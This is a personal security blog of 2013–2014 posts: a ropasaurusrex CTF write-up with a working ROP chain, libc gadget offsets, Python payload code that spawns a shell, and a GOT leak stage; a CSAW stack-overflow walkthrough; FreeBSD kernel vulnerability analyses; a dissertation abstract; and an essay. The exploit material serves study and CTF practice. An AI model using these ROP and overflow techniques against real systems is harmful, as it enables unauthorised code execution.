Thursday, 5 June 2014

ROP ROP ROP

Return Oriented Programming (ROP) is all the rage! Well almost, but it is needed when you can control the stack but not be able to execute from it i.e. with ASLR and NX. In this post I present my solution to ropasaurusrex which leveraged ROP. First the overflow:


It really doesn't get easier than this. There is a buffer on the stack which is much less than 256 bytes size and there is a read into that buffer of 256 bytes. We overwrite the return address and set the EIP free. That leave instruction in the epilog means that we can't just find a 'jmp esp' somewhere and easily use it. Also, I wanted to practice my ROP skills so I didn't consider any other exploitation vectors. So, we are going to build a ROP stack.

Aside from our binary there are two loaded modules:
(gdb) info sharedlibrary  
From        To          Syms Read   Shared Object Library 
0xf7e2f420  0xf7f5e6ee  Yes (*)     /lib32/libc.so.6 
0xf7fdc860  0xf7ff47ac  Yes (*)     /lib/ld-linux.so.2
I will be using libc for finding my gadgets. What are gadgets? Using ROP is like lining up dominoes and then letting them fall in some path. The only difference is that in ROP we might actually be able to make decisions because we can point to conditional instructions. In this case gadgets are the domino pieces that we line up by placing their addresses on the stack. The addresses are 'return' addresses pointing to the next gadget as if the next gadget has actually called the previous. Probably a convoluted explanation but it will make sense soon.

Imagine you have the following C code:
int a = 0; 
void A() { a++; return; } 
void B() { A(); a += 2; return; } 
void C() { B(); a += 3; return; }
That, in essence represents what a ROP chain is --- a list of gadgets. Starting with function C, by the time function A is invoked the stack will contain return addresses back to functions C and B in order. The actual useful 'work' parts are the increments of the variable 'a'. For this to be a proper ROP chain we will logically take out all the call instructions to any of the function and just pretend that they happened. Then we will point EIP to the 'a++' statement and let the code run. We want to do that because we want function A to do it's operation first. When A returns, it will return 'back' to B executing 'a += 2' and so on.

With this logic we can set up a theoretically arbitrary control flow. ROP has been shown to be turing complete [1] although in practice that might be tougher to achieve. There is also a similar method called Jump Oriented Programming [2] (JOP) which uses a dispatch address table and jump instructions to control flow of execution. It is similar to how C-style switch statements operate.

Back to our code. The EIP is trivially controlled, so let's talk about what we will do with it. To practice ROP I have disabled ASLR on my Virtual Machine by writing 0 to /proc/sys/kernel/randomize_va_space. Will be looking at leaking next time. This allows me to make assumptions about where my libc module is loaded at the time of exploitation.

The target application reads/writes on the standard IO. This means that I will be feeding the exploit through a pipe on the command line. So to get the ropasaurus to execute my commands I will have it execv a shell and then have access to any sort of shell commands. For this we will need the execv shellcode... but in ROP form.

We will use the execv system call via interrupt 0x80. So, somehow, we need to set up the registers as follows. Remember linux system calls expect parameters to be passed via registers.

    EAX = 0xB              // System call number
    EBX = PTR to "/bin/sh" // File to execute
    ECX = NULL             // Program arguments
    EDX = NULL             // Program environment

Once the registers are set up we call interrupt 0x80 and the kernel takes care of the rest. I like this method because there is no need to do any clean up. The only thing we should be aware of is that the shell will start reading STDIN looking for commands. This happens after ropasaurus has read 256 bytes. So our exploit buffer needs to contain the shell commands after 256 bytes (i.e. cat /etc/passwd).

At the minimum we want to replicate the functionality of this code:

(Courtesy of the Online Disassember)

We do this by finding gadgets in the libc image. Using an online tool, ropshell, I was able to generate searchable list of all possible gadgets. Basically those are all sets of possible instructions that end with a return or a jump instruction.

So we put together a "shellcode" sequence that looks like this. Think of it as the sequence pointers to instructions to be executed not the actual instruction byte codes sent to the program. At the beginning I notice that ECX has the pointer to our buffer. So I need to pivot the stack and have ESP point to it. We point the EIP to the first instruction:

    pop edx      'preparing for the next jmp.
    ret
    mov esp, ecx 'stack pivot
    jmp edx      
    pop ecx      'now at the beginning
    pop eax      '[pop #1]
    ret

This sequence allows us to "wrap" around ESP to the beginning of our buffer which gives us more space to play. Considering how the overflow worked this might not have been entirely necessary as there would probably be enough space to write the rest of the ROP chain. But it's done now.

In each case ret and jmp instructions are set up such that they point to the the next instruction to execute. In reality the EIP is jumping all around the libc text section. Next, we set up the registers to prepare for the system call.

    push esp
    pop ebx       'point near /bin/sh
    pop esi
    ret
    add ebx, eax  '[pop #1] adjusts ebx
    add eax, 2
    ret
    pop edx       'program environment
    ret
    add al, -0x17 'set EAX to 0xB
    ret
    int 0x80

Done. Once this sequence executes we will have the shell. Notice that it is very not straight forward as compared to the nice, no hacking, solution. Here we use EAX to adjust the EBX pointer before it is fixed up to be the system call number. The stack buffer is built up using the this python code:

buf += uint(0)            # the ecx for g2
buf += uint( (0xB + 0x17 - 2) ) # the eax for g2
buf += gadget(0x0010D251) # ret of g2 going to g3:
buf += 'AAAA'             # value for esi of g3
buf += gadget(0x00143242) # g4: add ebx, eax; add eax, 2; ret
buf += gadget(0x0002E3CC) # g7: pop edx; ret
buf += uint(0)            # value of edx for g7
buf += gadget(0x0010A44D) # g6: add al, -0x17, ret
buf += gadget(0x000EA621) # g5: int 0x80
buf += '/bin'
buf += '/sh\x00'
buf += "/bin/bash\x00"

buf = padwith(buf, 0x100-4*29)

# return address (initial EIP)
buf += gadget(0x0002E3CC) # g0: pop edx; ret

buf += gadget(0x000EE100) # value of edx for gadget 0
buf += gadget(0x0002E49D) # g1: mov esp, ecx; jmp edx

buf = padwith(buf, 0x100) # make exactly 256 bytes

The addresses are the values given by the ROPShell tool but the python code outputs the corrected offsets using the base address of libc. Once executed we can feed any sort of shells commands that we want:


ROP.

Update: I couldn't just let this one go without a full exploit. I've spent a little bit more time and developed a mechanism to leak out an address of a function within libc which gave me a chance to calculate the base address of the libc module.

The exploit will working like this. First we send in 256 bytes to leak out an address, then we send 256 bytes to execute a shell. It's a two stage exploit which also means that the it becomes interactive.

First, we notice that the binary was compiled without RELRO which means that the GOT PLT will be at a known address. The PLT contains dynamically generated addresses to library functions. There is a good write up of how it works on the ISISBlogs. So, we need to figure out a way to get those addresses.

The way I've done it is to point the initial return address to the write function in the PLT entry and on the stack I've put in the parameters for the write call. Essentially I simulate the call to write once the function containing a read returns. This write will send back 0x1C bytes of the PLT - the entire table. On the same stack I put in the address of the main function, so that I could start the process again allowing me another shot at the bug knowing the location of the write function. At this point, see the beginning of the blog.

The code for the leak looks like this:

   buf = padwith(buf, 0x100-4*29)

   # return address (initial EIP)
   buf += addr(0x08048312) # point to write@plt
   buf += addr(0x0804841D) # return main 
   buf += uint(1)          # STDOUT
   buf += uint(0x08049614) # point to the plt for write
   buf += uint(0x1c)       # write buffer size

   buf = padwith(buf, 0x100) 

Works every time.

---------------------

[1] E. Buchanan, R. Roemer, H. Shacham, and S. Savage. When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC. In 15th ACM CCS, pages 27–38, New
York, NY, USA, 2008. ACM.

[2] T. Bletsch, X. Jiang, V. Freeh and Z. Liang. Jump-Oriented Programming: A New Class of Code-Reuse Attack. ASIACCS ’11, March 22–24, 2011, Hong Kong, China.

Thursday, 22 May 2014

The winter of 2014 was cold.

During the months of January and February of the year 2014 I gave an objective to myself. It was to finish the masters dissertation to the point of submission. I also learned that picking a hard topic was probably not the best idea but it was certainly rewarding. Nonetheless, I still received a distinction (the Oxford version of an A) for the work. So, I'm happy share it with the world welcoming any sort of feedback.

If you're interested you can read the full paper here: The full paper

Abstract
Personal computing devices and servers are becoming more powerful by the day through hardware parallelisation. Such advances require developers to look into concurrency in order to take advantage of the new computing power. However, much of the code is written without formal verification and checked only heuristically through unit or other tests. This dissertation will show how Communicating Sequential Processes (CSP) can be used to detect errors in an application that supports concurrent execution. This is done by isolating common concurrency problems and mapping them into CSP representations. Finally, Failures-Divergences Refinement (FDR) software package is used to perform refinement checks to detect the errors in the source code. This process allows the developer to build assertions that their code must pass to prove its correctness. 


Acknowledgements
I would like to thank my advisor, Dr. Andrew Simpson, and the Software Engineering Program staff for their guidance and quick responses. This project could not have been accomplished without the generosity, patience and accommodation of the family scholarship fund. I am particularly grateful to the American people for providing the opportunity and the Lithuanian people for their infinitely delicious food and heavenly honey. Finally, I wish to thank my wife, Diana, for her love, support and conversation. 

Wednesday, 21 May 2014

A simple one

CTF challenges can be great fun. One evening had a few minutes and decides to work a simple one from CSAW. It can be downloaded from shell-storm.org. Here's the break down:

A server listens on a TCP socket port 31338. It forks on a connection creating a new process for each client. The server send sends some data and reads some data into a buffer. At that point the handling function either calls exit or returns. The last part is interesting because on return the exploit can succeed and gain execution. If the exploit fails to set up the stack correctly, the process will exit without gaining execution.

This challenge is a good starter, although I would not expect this sort of a situation to come up anymore. Perhaps in old or deliberately bad software. This situation was more common in the 90's. The use in the exercise is to go through the motions of learning how stack corruption vulnerabilities work.

First, a connection comes in. The server forks to create a new process:


The handle function is called with the client socket file descriptor as the first parameter. Here we see a modern compiler convention to place the parameters on the stack using a mov instruction. Older compilers usually use the push instruction. The end result is the same because at the time of the call the first thing on the stack (i.e. [esp]) is the first parameter. This fits the calling convention used by the called function.

The handle function has several things in its stack frame: buffer, some byte variable, 32bit integer:


We see that the buffer is of size 2047 bytes due to it's large offset. Specifically, it is the distance between the buffer and the next variable. 0x80C - 0xD which is 2060 - 13 = 2047. I called the next variable 'zero' because that is the value that will be assigned to it after the overflow happens. The cookie actually simulates a stack canary implemented early on by compilers to protect against stack based buffer over flows. We'll see later how that can be over come for this challenge.

The cookie will contain a random value seeded off of the time that the handle function runs. At first glance I was thinking that we would have to try to guess it based on the approximate time of the server. But it gets better. Here we can see the assignment:


We can also see that the cookie is being saved of to a location in the data segment called secret. Later, that is how the function will know if the cookie has been corrupted.

Let's look at the next interesting chunk of code:


There are two calls to the send function. First one loads the address of the buffer as the parameter which actually sends the stack location of the buffer. Second send loads up the cookie and sends that to the client. So we really have all information we need. This would also explain the funny characters we get upon connection to the server.


Finally, the overflow occurs when the receive function is called. That is because it reads 4096 bytes into a 2047 byte buffer. 


After the receive, the zero variable is assigned with zero value (just one byte). This is here just to make things slightly harder for you. Next the cookie is checked against the secret value. If the value matches then the function jumps away to return. The return is what will trigger the exploit and give us the code execution. If the value do not, then the code falls through and executes exit.


So the stacks looks like this: 
(low addr)
 [ 2047 bytes ] | [ zero byte] | [cookie] | [ few registers ] | [return addr] | [ socket]
(high addr)

This means that we need to write to the socket a value large enough to overwrite the return address which will become the EIP when the retn instruction is executed. So the actual exploit looks like this:


This code will read from the socket the address of the buffer and the cookie which will allow us to put those values into the exploit string.

Simple! Right? Well, not if you've never done this before.

Saturday, 25 January 2014

FreeBSD-SA-09:14.devfs

About the same time as the pipe vulnerability there was a devfs race condition discovered. This vulnerability manifested itself by an uninitialized vnode pointer being used. The pointer would be NULL and could be used by another process before it is assigned to an actual vnode. The vulnerability doesn't have a specific "place" in the code because it results due to the product of how devfs and vfs interact. However, the fix was made in devfs.

The bug turned out to be exploitable with the exploit nicely described by XORL blog post. I will be going into a little more detail about the code paths leading to the vulnerability.

First a process tries to open a devfs file (i.e. /dev/null or similiar). This is done through the open system call which eventually executes kern_open kernel function.

int
kern_open(struct thread *td, char *path, enum uio_seg pathseg, int flags, int mode)
{
        ....
/* An extra reference on `nfp' has been held for us by falloc(). */
fp = nfp;
cmode = ((mode &~ fdp->fd_cmask) & ALLPERMS) &~ S_ISTXT;
NDINIT(&nd, LOOKUP, FOLLOW, pathseg, path, td);
td->td_dupfd = -1; /* XXX check for fdopen */
error = vn_open(&nd, &flags, cmode, indx);
        ...
}
Almost at the very beginning the call goes down the path of vn_open which executes the VFS specific functionalities. vn_open performs many checks, such as does the user have access to the file or are the access flags correct? It eventually passes control to the devfs subsystem for the actual device opening:

int
vn_open_cred(ndp, flagp, cmode, cred, fdidx)
struct nameidata *ndp;
int *flagp, cmode;
struct ucred *cred;
int fdidx;
{
...
restart:
vfslocked = 0;
fmode = *flagp;
...
ndp->ni_cnd.cn_nameiop = LOOKUP;
ndp->ni_cnd.cn_flags = ISOPEN |
   ((fmode & O_NOFOLLOW) ? NOFOLLOW : FOLLOW) |
   LOCKSHARED | LOCKLEAF | MPSAFE;
if ((error = namei(ndp)) != 0)
return (error);
ndp->ni_cnd.cn_flags &= ~MPSAFE;
vfslocked = (ndp->ni_cnd.cn_flags & GIANTHELD) != 0;
vp = ndp->ni_vp;
}
       ...
if ((error = VOP_OPEN(vp, fmode, cred, td, fdidx)) != 0)
goto bad;
if (fmode & FWRITE)
vp->v_writecount++;
*flagp = fmode;
ASSERT_VOP_LOCKED(vp, "vn_open_cred");
if (fdidx == -1)
VFS_UNLOCK_GIANT(vfslocked);
return (0);
bad:
NDFREE(ndp, NDF_ONLY_PNBUF);
vput(vp);
VFS_UNLOCK_GIANT(vfslocked);
*flagp = fmode;
ndp->ni_vp = NULL;
return (error);
}
Here the call is passed through to devfs via the VOP_OPEN marco call.
static int
devfs_open(struct vop_open_args *ap)
{
...
dsw = dev_refthread(dev);
if (dsw == NULL)
return (ENXIO);
/* XXX: Special casing of ttys for deadfs.  Probably redundant. */
if (dsw->d_flags & D_TTY)
vp->v_vflag |= VV_ISTTY;
VOP_UNLOCK(vp, 0, td);
...
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY, td);
dev_relthread(dev);
...
fp = ap->a_td->td_proc->p_fd->fd_ofiles[ap->a_fdidx];
KASSERT(fp->f_ops == &badfileops,
    ("Could not vnode bypass device on fdops %p", fp->f_ops));
fp->f_ops = &devfs_ops_f;
fp->f_data = dev;
return (error);
}
So far so good, nothing terribly bad has happened, there is no memory corruption. However, the problem is that right after the VOP_UNLOCK(vp, 0, td) call another thread can start using the file descriptor. If the second thread does not check the vnode pointer then it would be in trouble. At this point the kernel has not assigned the vnode to the file descriptor (fp) structure.

This assignment happens later in the kern_open call in the same execution thread. In fact, it happens just before the function returns to the user land.
int
kern_open(struct thread *td, char *path, enum uio_seg pathseg, int flags,
    int mode)
{
...
FILEDESC_LOCK(fdp);
FILE_LOCK(fp);
if (fp->f_count == 1) {
mp = vp->v_mount;
KASSERT(fdp->fd_ofiles[indx] != fp,
   ("Open file descriptor lost all refs"));
FILE_UNLOCK(fp);
FILEDESC_UNLOCK(fdp);
VOP_UNLOCK(vp, 0, td);
vn_close(vp, flags & FMASK, fp->f_cred, td);
VFS_UNLOCK_GIANT(vfslocked);
fdrop(fp, td);
td->td_retval[0] = indx;
return (0);
}
fp->f_vnode = vp;
if (fp->f_data == NULL)
fp->f_data = vp;
fp->f_flag = flags & FMASK;
if (fp->f_ops == &badfileops)
fp->f_ops = &vnops;
fp->f_seqcount = 1;
fp->f_type = (vp->v_type == VFIFO ? DTYPE_FIFO : DTYPE_VNODE);
FILE_UNLOCK(fp);
FILEDESC_UNLOCK(fdp);
...
}
The assignment marked above is where it happens. As mentioned before, it is too late by that time and there is a danger that the pointer could be used. That is exactly what happened in the exploit code. The fix was to go back to the devfs_open call, break the abstraction, and assign the vnode to the file descriptor right after the unlock happens.

Saturday, 18 January 2014

FreeBSD-SA-09:13.pipe

Code seems to age much quicker that anything else. Way back - not so long ago - in 2009 there was a bug in the FreeBSD kernel PIPE and EVENT handling code. This turned out to be exploitable in versions 6.x of the kernel. It was never truly patched, however the code was redesigned in order to eliminate a whole set of potential vulnerabilities including this one. The bug was published by the FreeBSD security advisory FreeBSD-SA-09:13.pipe.asc. A proof of concept exploit is available for this vulnerability: http://www.frasunek.com/pipe.txt.

For this analysis I needed to figure out what sequences of events lead to the vulnerability manifestation. I won't go into details about how the corruption happened and how the exploit works. Also, I haven't actually tried to execute it - so, I'm merely assuming that it works.

Unless you know the details of how kqueues, knote lists and pipes work, this vulnerability is actually quite hard to spot even if the patch is available. The patch covers a lot of code and does not highlight the bug itself. So, if for some strange reason you're trying to figure out this vulnerability then this post should give you the initial steps.

The vulnerable version of the kernel is still available in the current (as of this writing) FreeBSD SVN: http://svnweb.freebsd.org/base/release/6.0.0/. All analysis below follows that code.

We start with function pipe_close which gets called via the close system call.
static int
pipe_close(fp, td)
    struct file *fp;
    struct thread *td;
{
    struct pipe *cpipe = fp->f_data;

    fp->f_ops = &badfileops;
    fp->f_data = NULL;
    funsetown(&cpipe->pipe_sigio);
    pipeclose(cpipe);
    return (0);
}
This function obtains the pipe structure and sends it on to the pipeclose function. It is important to note that a pipe has two parts. The read and write, however it is one entity. The pipe pair is allocated in the same UMA (Upper Memory Area) zone as one chunk of memory. So, really the read/write pipes refer to the same general space.

Pipeclose then obtains the pair and tries to flush the pipe and clear out any knotes attached to it. A knote is a special mechanism used for kernel to user event notification. In very basic terms it is a select optimized for a special case. In select the user has to pass a whole list of identifiers to the kernel while with a knote a user subscribes to a filter (the event criteria) and allows for a much more granular event notification. The user process maintains a kqueue of the events it is listening on while each identifier being listened on maintains a knote linked list to know who to notify. A much more detailed description of this mechanism can be found in this paper: kqueue.pdf.

Once various closing/flushing processes are complete the pipeclose function tries to clear out the pipe by starting with the knote list. About half way down the list, the following sequence is executed:
static void
pipeclose(cpipe)
      struct pipe *cpipe;
{
      struct pipepair *pp;
      struct pipe *ppipe;
      .....
      PIPE_UNLOCK(cpipe);
      pipe_free_kmem(cpipe);
      PIPE_LOCK(cpipe);
      cpipe->pipe_present = 0;
      pipeunlock(cpipe);
      knlist_clear(&cpipe->pipe_sel.si_note, 1);
      knlist_destroy(&cpipe->pipe_sel.si_note);
      .....
}


Can you spot the bug? The above code is basically it. I wouldn't expect you to, unless you're a kernel hacker for this particular portion of the kernel. Specifically, the last two lines in the above listing cause the problem.

  • The PIPE_LOCK mutex isn't protecting the pipe, it is protecting the pipelock mutex.
  • The pipe is UNLOCKED by the pipeunlock call before calls to knlist_clear and knlist_destroy are made.
This means that two processes can be calling knlist_clear and knlist_destroy unsafely. Both of those functions are not thread safe. So, it can happen that a linked list of knotes for the pipe is reinitialized (via the destroy call) while it is still being cleared. The clearing is a blocking procedure that sends out notifications to processes on the knote list. While the clearing function is traversing the same linked list it could easily be destroyed by another process because that process sees an already cleared list.





Thursday, 9 January 2014

FreeBSD-SA-10:09.pseudofs

Older FreeBSD 7 and 8 versions had a bug in the pseudofs module - back in 2010. This bug manifested through an unnecessary mutex release which turned out to be exploitable through a NULL pointer dereference. In this post I will do a walk through to show the events that lead up to the bug. For more information check out the security advisory: FreeBSD-SA-10:09.pseudofs.asc. There is also a proof of concept exploit available on Security Focus.

The chain starts with a call to extattr_get_link in kern/vfs_extattr.c
ssize_t extattr_get_link(const char *path, int attrnamespace,
const char *attrname, void *data, size_t nbytes);
Which obtains extended attributes from a vnode. The functions looks like this
int extattr_get_link(td, uap)
struct thread *td;
struct extattr_get_link_args /* {
const char *path;
int attrnamespace;
const char *attrname;
void *data;
size_t nbytes;
} */ *uap;
{
...
vfslocked = NDHASGIANT(&nd);
error = extattr_get_vp(nd.ni_vp, uap->attrnamespace, attrname,
   uap->data, uap->nbytes, td);
vrele(nd.ni_vp);
VFS_UNLOCK_GIANT(vfslocked);
return (error);
}
The important part being selected, we see a call to extattr_get_vp. This was essentially a wrapper adding a few bells and whistles to the process.
static int
extattr_get_vp(struct vnode *vp, int attrnamespace, const char *attrname,
    void *data, size_t nbytes, struct thread *td)
{
struct uio auio, *auiop;
struct iovec aiov;
ssize_t cnt;
size_t size, *sizep;
int error;
VFS_ASSERT_GIANT(vp->v_mount);
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
...
 
error = VOP_GETEXTATTR(vp, attrnamespace, attrname, auiop, sizep,
   td->td_ucred, td);
if (auiop != NULL) {
cnt -= auio.uio_resid;
td->td_retval[0] = cnt;
} else
td->td_retval[0] = size;
done:
VOP_UNLOCK(vp, 0);
return (error);
}
We are starting to see a few statements directly relating to the vulnerability. First there is the vn_lock
vn_lock(vp, LK_EXCLUSIVE | LK_RETRY);
which takes in the vnode pointer that we are interested in. This is the call that locks the vnode and the mutex in question. The code for that is slightly convoluted. Instead of using mtx_lock,  it works by invoking the lock manager.
// in kern/vfs_vnops.c
#define vn_lock(vp, flags) _vn_lock(vp, flags, __FILE__, __LINE__)
 
int
_vn_lock(struct vnode *vp, int flags, char *file, int line)
{
int error;
VNASSERT((flags & LK_TYPE_MASK) != 0, vp,
   ("vn_lock called with no locktype."));
do {
...
error = VOP_LOCK1(vp, flags, file, line);            
flags &= ~LK_INTERLOCK; /* Interlock is always dropped. */
...
} while (flags & LK_RETRY && error != 0);
return (error);
}
The function passes control to the VOP_LOCK1 marco. Here the control goes into the custom psuedofs territory. The module, however, does not implement the lock function and so a default locking function is used.
// kern/vfs_default.c
int
vop_stdlock(ap)
struct vop_lock1_args /* {
struct vnode *a_vp;
int a_flags;
char *file;
int line;
} */ *ap;
{
struct vnode *vp = ap->a_vp;
return (_lockmgr_args(vp->v_vnlock, ap->a_flags, VI_MTX(vp),
   LK_WMESG_DEFAULT, LK_PRIO_DEFAULT, LK_TIMO_DEFAULT, ap->a_file,
   ap->a_line));
}
Here we see that the default implementation passes the lock, vp->v_vnlock, to the lock manager via the _lockmgr_args function - a function too complex to show here and unnecessary for my purposes. The mutex is officially locked. Going back to extattr_get_vp we see a call to VOP_GETEXTATTR
error = VOP_GETEXTATTR(vp, attrnamespace, attrname, auiop, sizep,
    td->td_ucred, td);
This marco sends us to the module code where the actual extended attributes extraction occurs. The call resolves to pfs_getextattr function - through various function pointer magic. While essentially a wrapping function, akin to the Java synchronized block, this is where the bug lives.
static int
pfs_getextattr(struct vop_getextattr_args *va)
{
struct vnode *vn = va->a_vp;
struct pfs_vdata *pvd = vn->v_data;
struct pfs_node *pn = pvd->pvd_pn;
struct proc *proc;
int error;
PFS_TRACE(("%s", pn->pn_name));
pfs_assert_not_owned(pn);
/*
* This is necessary because either process' privileges may
* have changed since the open() call.
*/
if (!pfs_visible(curthread, pn, pvd->pvd_pid, &proc))
PFS_RETURN (EIO);
if (pn->pn_getextattr == NULL)
error = EOPNOTSUPP;
else
error = pn_getextattr(curthread, proc, pn,
   va->a_attrnamespace, va->a_name, va->a_uio,
   va->a_size, va->a_cred);
if (proc != NULL)
PROC_UNLOCK(proc);
  
 pfs_unlock(pn); //<---- BUG
PFS_RETURN (error);
}
That  pfs_unlock call is the culprit. Taking in the same node we saw in the VOP_LOCK1 call we saw earlier, it unlocks the mutex for the node. In retrospect the bug seems obvious. Why would the developer think that it is ok to mess with a mutex that was modified on a much high abstraction layer. I'm sure there was a good reason at the time. Perhaps the code was refactored where this unlocking step no longer makes sense. Regardless, the line was here and it caused a vulnerability. pfs_unlock itself is a simple inline function defined in fs/pseudofs/pseudofs_internal.h
static inline voidpfs_unlock(struct pfs_node *pn){
mtx_unlock(&pn->pn_mutex);}
Now for completeness, the other unlocking call happens back in extattr_get_vp  function through a call to a VOP function
static int
extattr_get_vp(struct vnode *vp, int attrnamespace, const char *attrname,
    void *data, size_t nbytes, struct thread *td)
{
 
...
VOP_UNLOCK(vp, 0);
return (error);
}
Again, psuedofs does not implement the unlocking function and uses a default implementation which uses the lock manager.

I've not gone into the details of how the actual corruption occurs and how it can be exploited. Perhaps another time. For my task I just needed to know the call chains that lead up to the bug. Hope you enjoyed reading it. An unpached version can be seen here: 8.3.0/sys/fs/pseudofs/pseudofs_vnops.c

Sunday, 24 November 2013

Why we write.

For unknown reasons a thought bounced around: Why do people write? Let's put on the logical hat and make a list. The reasons mentioned below are very fundamental and contain many more detailed reasons. These specific ones are mentioned because the author felt that the following should not be generalized any further.

Memorialization seems to be the easiest reason and arguably the biggest reason. We want to remember things. Something happened? Write it down for future reference. Thought of a great idea? Write it down.

This, however, can be a tricky one due to all sorts of biases involved. An event happens and time passes until it is written down. With time the accuracy starts to degrade with some decay function. Then there is a problem if biases and points of view, the recorded event is at maximum only as accurate as the author's observation. The skill of the author to describe the events can also bring the accuracy into question. Elizabeth Loftus talks about the creation of false memories which is hardly a malicious intent but throws even more uncertainty into the mix.

Maintaining trust in the record is an incredibly difficult undertaking. My theory is that most of us just close our eyes and pretend everything is OK unless something obvious stand out. Of course as a society we put various means of alleviating the problem of trust. Means such as the use of references, language standards and peer reviews. All of which reduce to some form of trust in a person. These approaches probably work well assuming that most people are not malicious is nature.
Organization is an easy one as well. With thousands of things happening all at once, there is a good chance you can't keep track of them all. This is probably closely tied to memorialization but with a different purpose.

It is a lot easier to trust the accuracy of this type of writing because the entities being described have either been documented somewhere else (shifting the validation from the writing in question) or they are ideas created by the author. Ideas created by the author can be assumed to be 100% accuracy because the writing in question is the first instance where the idea enters the world. The only other place the idea exists is the author's head which we cannot compare the accuracy to.
Discussion with yourself or others. This one is not so obvious, at least not until one thinks about the question. We write letters to discuss things with others. But, we also write diaries and notes to keep track of what we've thought of in order to follow the steps of logic. Discussion is very similar to organization, as in organization of thought. However, it deserves its own mention due to the difference of intent.

The intent in writing for the sake of discussion is to show a trail of thought. Probably everyone can remember C follows B follows A but what if there are 30 steps. That requires writing things down, perhaps with the author as the only audience. For example, one of the purposes of this blog is to help the author organize his thoughts of experimentation.
Art, some people like to write for the sake of writing. Something about the word play that drives people to come up with elaborate combinations that have nothing but artistic value.


In almost every case a piece of writing will contain several of these forms. In some cases the art will be pervasive through the entire piece, however others can be mutually exclusive in different parts of the written piece. When the author puts their art into the writing, the readers enjoy it more.